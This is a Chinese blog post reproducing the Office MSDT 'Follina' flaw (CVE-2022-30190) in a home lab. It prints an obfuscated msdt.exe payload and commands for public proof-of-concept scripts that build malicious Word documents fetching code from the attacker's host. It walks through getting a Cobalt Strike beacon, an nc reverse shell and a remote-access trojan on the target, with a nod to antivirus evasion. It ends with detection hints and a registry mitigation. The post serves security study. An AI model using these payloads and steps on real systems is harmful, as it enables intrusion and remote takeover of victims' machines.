CVE-2022-30190:Microsoft office MSDT 代码执行漏洞

于 2024-04-18 17:45:00 发布
阅读量870 收藏 7
点赞数 18
文章标签: microsoft c# 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zkaqlaoniao/article/details/137880567
版权

漏洞概述

该漏洞首次发现在2022 年 5 月 27 日,由白俄罗斯的一个 IP 地址上传。恶意文档从 Word 远程模板功能从远程 Web 服务器检索 HTML 文件,通过 ms-msdt MSProtocol URI方法来执行恶意PowerShell代码。感染过程利用 Windows 程序 msdt.exe,该程序用于运行各种 Windows 疑难解答程序包。此工具的恶意文档无需用户交互即可调用它。导致在宏被禁用的情况下,恶意文档依旧可以使用 ms-msdt URI执行任意PowerShell代码。

影响版本

目前已知影响的版本为:

  • office 2021 Lts

  • office 2019

  • office 2016

  • Office 2013

  • Office ProPlus

  • Office 365

漏洞复现

官方payload
msdt.exe /id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'YwBhAGwAYwA='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe"

在cmd中运行即可弹出计算器:

图片

环境部署

office下载地址:
https://otp.landian.vip/zh-cn/download.html
因为已经部署好了,简单截图说明一下:

图片


windows环境用了:

图片

环境说明:

攻击机ip:192.168.84.205
目标靶机ip:192.168.84.185

使用poc1:

下载地址:
https://github.com/chvancooten/follina.py
在攻击机执行:
python3 .\follina.py -t docx -m binary -b \windows\system32\calc.exe -u 192.168.84.205
生成恶意docx文档:

图片


将clickme.docx放在靶机打开:

图片


这里远程加载恶意文件,生活中遇到这种情况可以警惕了。
程序错误诊断,然后弹出计算器:

图片

攻击机可以看到远程加载请求:

图片

复现成功。
我们肯定不满足于弹出计算器,如何深度利用获取权限呢?

使用poc2

poc1的命令执行没看懂。
下载地址:
https://github.com/JohnHammond/msdt-follina

CS上线

在cs上生成木马,这个不用多说。
创建pocexe文件夹,将nc,cs木马放进去,并在该目录下开启简单的http.server服务:

图片


开启服务:
python -m http.server 8080

图片


改poc(follina.py)文件下载路径:

图片

生成恶意文档:
python follina.py -i 192.168.84.205 -p 8000 -r 5555 #-r为反弹shell的端口,这里暂时用不到

图片

将生成的follina.doc放在靶机打开:

图片

看到cs上线:

图片

查看进程:

图片

文件存在:

图片

nc反弹shell:

改poc配置:
 

图片

执行命令:
python follina.py -i 192.168.84.205 -p 8000 -r 5555 #这里用到了 -r 反弹shell

图片

将生成得doc文档放在靶机执行:

图片

反弹shell成功:

图片

看到nc运行:

图片

大灰狼远控

用了7.5的版本,9.5的版本在虚拟机运行报错,大半天都没解决。
生成木马:

图片

系统设置,配置监听端口:

图片


然后与上面的两种方式一样,加载大灰狼木马

图片

目标机运行:

图片

上线:

图片

免杀做好,还是比较强大的:

图片

简单分析

将doc文件后缀改为zip:

图片

图片

解压:

图片


可以根据这个ip溯源反制。
检测的思路:

从cmd/msedge/office这些进程诞生的msdt.exe进程是可疑的。msdt.exe里参数带有/../../xxxx/.exe,恶意payload。 直接检测这个也是可以的。

修复建议

以管理员身份运行命令提示符,执行以下两条命令:

reg export HKEY_CLASSES_ROOT\ms-msdt filenamereg delete HKEY_CLASSES_ROOT\ms-msdt /f

撤消解决方法:

reg import filename

总结

对大佬们的文章进行了资源整合。这里仅作线下学习,如有违法行为,与本人无关。

参考文章

https://blog.csdn.net/weixin_45329947/article/details/125089243
https://www.cnblogs.com/bonelee/p/16337291.html

 申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。

免费领取安全学习资料包!

渗透工具

技术文档、书籍

 

面试题

帮助你在面试中脱颖而出

视频

基础到进阶

环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等

 

应急响应笔记

学习路线

渗透测试老鸟-九青
关注
Windows支持诊断工具(MSDT)远程代码执行漏洞(CVE-2022-30190)分析复现/修复
hongduilanjun的博客
06-08 3432
Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability对应的cveCVE-2022-30190,其能够在非管理员权限、禁用宏且在windows defender的情况下绕过防护,达到上线的效果。这里我们不对漏洞原理做过多的阐述(因为太菜),主要是进行漏洞的复现。在这里笔者只测试了如下版本能够适用,对于Office的 Insider 和 Current 和版本无法进行利用Microsoft Of
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
远程代码执行漏洞CVE-2022-30190
weixin_47623655的博客
03-30 401
近期发现了一项关于 Microsoft Support Diagnostic Tool (MSDT) 的远程代码执行漏洞,该漏洞被命名为CVE-2022-30190。在此漏洞的攻击中,攻击者可以利用漏洞远程执行代码,从而实现对受影响系统的完全控制。本文将对CVE-2022-30190进行深入的分析。CVE-2022-30190漏洞是一项非常危险的远程代码执行漏洞,攻击者可以利用该漏洞执行任意代码,并最终控制受感染系统。由于CVE-2022-30190漏洞的严重性,任何未受影响的系统都可能受到攻击。
CVE-2022-30190(follina):Microsoft诊断工具(MSDT)远程代码执行漏洞复现(超级详细)
aihiglh的博客
06-15 3799
CVE-2022-30190的复现与使用,由一位中学生独自编写(第一次写文章),干货较多,欢迎收藏和讨论交流
CVE-2022-30190 MSDT远程代码执行漏洞复现
热爱学习,喜欢折腾!
09-29 1461
Microsoft Office 是由 Microsoft (微软)公司开发的一套办公软件套装。常用组件有 Word、Excel、PowerPoint 等。Microsoft Office 存在远程代码执行漏洞,攻击者可通过恶意 Office 文件中远程模板功能从服务器获取恶意 HTML 文件,通过 'ms-msdt' URI 来执行恶意 PowerShell 代码
CVE-2022-30190 漏洞复现
weixin_53884648的博客
11-10 6123
通过exp实现了对微软目前存在的office-word-2016的成功复现
CVE-2022-4510:Binwalk 远程代码执行漏洞
07-03
本文将深入探讨一个与二进制分析工具相关的安全事件,即"CVE-2022-4510:Binwalk 远程代码执行漏洞"。Binwalk是一款广泛使用的开源工具,主要用于固件分析、逆向工程和提取嵌入式系统的固件图像。这个漏洞可能导致...
Windows支持诊断工具(MSDT)远程代码执行漏洞CVE-2022-30190学习及复现
加油~
08-17 4372
Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability对应的cve编号为CVE-2022-30190,其能够在非管理员权限、禁用宏且在windows defender开启的情况下绕过防护,达到上线的效果。
msdt.exe
最新发布
11-23
msdt
mdm.exe文件
06-23
Visual Studio调试器所需的mdm.exe文件,添加后即不会报错。
微软安全漏洞CVE-2022-30190
bpqd2008的专栏
06-05 442
微软安全漏洞CVE-2022-30190
MICROSOFT OFFICE MSDT操作系统命令注入漏洞CVE-2022-30190
huayimy的博客
11-23 1303
MICROSOFT OFFICE MSDT操作系统命令注入漏洞CVE-2022-30190)输入技术支持人员提供的密钥
Microsoft Office MSDT 存在远程代码执行漏洞CVE-2022-30190
axiom2020的博客
06-06 670
Microsoft Office MSDT 远程代码执行漏洞CVE-2022-30190
office CVE-2022-30190 RCE 复现
qq_44005305的博客
09-01 208
简介:当用户点击word等应用程序时,会使用URL协议调用MSDT,随即启动msdt.exe程序造成远程代码执行漏洞。简单来说就是攻击者可以恶意构造一个word文档,诱骗受害者点击,从而导致系统被黑。
CVE-2022-30190Microsoft Office MSDT Rce漏洞
冬的博客
06-09 1432
MSDTMicrosoft Support Diagnostics Tool,微软支持诊断工具)是一个Windows实用程序,用于排除故障并收集诊断数据以供专业人员分析和解决问题。攻击者可通过恶意 Office 文件中远程模板功能从服务器获取恶意 HTML 文件,通过 'ms-msdt' URI 来执行恶意 PowerShell 代码。...
Microsoft Office MSDT代码执行漏洞CVE-2022-30190漏洞复现
网安君的博客
06-01 2873
漏洞首次发现在2022 年 5 月 27 日,由白俄罗斯的一个 IP 地址上传。恶意文档从 Word 远程模板功能从远程 Web 服务器检索 HTML 文件,通过 ms-msdt MSProtocol URI方法来执行恶意PowerShell代码。感染过程利用 Windows 程序 msdt.exe,该程序用于运行各种 Windows 疑难解答程序包。此工具的恶意文档无需用户交互即可调用它。导致在宏被禁用的情况下,恶意文档依旧可以使用 ‘ms-msdt’ URI执行任意PowerShell代码。目前已知影
cve-2022-30190 msdt远程代码执行漏洞复现
09-10
CVE-2022-30190是一个针对Microsoft漏洞,被称为msdt远程代码执行漏洞。该漏洞允许攻击者通过利用命令行工具"msdt.exe"的特定参数进行远程代码执行。以下是关于该漏洞的复现过程。 首先,我们需要使用攻击者控制...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值